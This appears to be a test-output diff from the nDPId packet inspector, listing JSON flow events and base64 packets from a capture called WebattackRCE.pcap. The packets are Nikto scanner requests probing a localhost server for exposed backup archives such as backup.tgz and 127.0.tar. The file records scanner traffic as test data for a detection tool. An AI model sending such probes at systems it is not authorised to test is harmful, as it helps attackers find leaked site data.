+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277221,"flow_last_seen":1576420277221,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277221,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50232,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":345,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277222,"flow_last_seen":1576420277222,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277222,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50234,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":1,"flow_last_seen":1576420277222,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277222,"pkt":"AAAAAAAAAAAAAAAACABFAADCu\/NAAEAGgEB\/AAABfwAAAcQ6H5D46YNpMAqH8IAYAED+tgAAAQEICp1m\/Q6dZv0OR0VUIC9iYWNrdXAudGd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":345,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277222,"flow_last_seen":1576420277222,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277222,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50234,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":345,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277222,"flow_last_seen":1576420277222,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277222,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50234,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":346,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277224,"flow_last_seen":1576420277224,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277224,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50236,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":346,"flow_packet_id":1,"flow_last_seen":1576420277224,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277224,"pkt":"AAAAAAAAAAAAAAAACABFAADCyzFAAEAGcQJ\/AAABfwAAAcQ8H5A0R\/O25IFzRIAYAED+tgAAAQEICp1m\/RCdZv0PR0VUIC9iYWNrdXAudGd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277224,"flow_last_seen":1576420277224,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277224,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50236,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277224,"flow_last_seen":1576420277224,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277224,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50236,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":347,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277225,"flow_last_seen":1576420277225,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277225,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50238,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":347,"flow_packet_id":1,"flow_last_seen":1576420277225,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277225,"pkt":"AAAAAAAAAAAAAAAACABFAAC90OxAAEAGa0x\/AAABfwAAAcQ+H5C1k+hxPtlM+IAYAED+sQAAAQEICp1m\/RGdZv0RR0VUIC8wLmFseiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":347,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277225,"flow_last_seen":1576420277225,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277225,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50238,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":347,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277225,"flow_last_seen":1576420277225,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277225,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50238,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":348,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277228,"flow_last_seen":1576420277228,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277228,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50240,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":348,"flow_packet_id":1,"flow_last_seen":1576420277228,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277228,"pkt":"AAAAAAAAAAAAAAAACABFAAC9wfFAAEAGekd\/AAABfwAAAcRAH5ChSfl1EHb5\/IAYAED+sQAAAQEICp1m\/RSdZv0UR0VUIC8wLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277228,"flow_last_seen":1576420277228,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277228,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50240,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277228,"flow_last_seen":1576420277228,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277228,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50240,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":349,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277229,"flow_last_seen":1576420277229,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277229,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50242,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":349,"flow_packet_id":1,"flow_last_seen":1576420277229,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277229,"pkt":"AAAAAAAAAAAAAAAACABFAADB75lAAEAGTJt\/AAABfwAAAcRCH5BYYNcNJ8u6iIAYAED+tQAAAQEICp1m\/RWdZv0VR0VUIC8xMjcwMC5hbHogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":349,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277229,"flow_last_seen":1576420277229,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277229,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50242,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":349,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277229,"flow_last_seen":1576420277229,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277229,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50242,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":350,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277231,"flow_last_seen":1576420277231,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277231,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50244,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":350,"flow_packet_id":1,"flow_last_seen":1576420277231,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277231,"pkt":"AAAAAAAAAAAAAAAACABFAADB77xAAEAGTHh\/AAABfwAAAcREH5CTV9cik40gf4AYAED+tQAAAQEICp1m\/RedZv0WR0VUIC8xMjcwMC5hbHogSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":350,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277231,"flow_last_seen":1576420277231,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277231,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50244,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":350,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277231,"flow_last_seen":1576420277231,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277231,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50244,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":351,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277232,"flow_last_seen":1576420277232,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277232,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50246,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":351,"flow_packet_id":1,"flow_last_seen":1576420277232,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277232,"pkt":"AAAAAAAAAAAAAAAACABFAADB9\/xAAEAGRDh\/AAABfwAAAcRGH5CWhs9n6ph7xIAYAED+tQAAAQEICp1m\/RidZv0YR0VUIC8xMjcuMC50YXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":351,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277232,"flow_last_seen":1576420277232,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277232,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50246,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":351,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277232,"flow_last_seen":1576420277232,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277232,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50246,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":352,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277233,"flow_last_seen":1576420277233,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277233,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50248,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":352,"flow_packet_id":1,"flow_last_seen":1576420277233,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277233,"pkt":"AAAAAAAAAAAAAAAACABFAADB+aZAAEAGQo5\/AAABfwAAAcRIH5BuH8E5NSGMTIAYAED+tQAAAQEICp1m\/RmdZv0ZR0VUIC8xMjcuMC50YXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 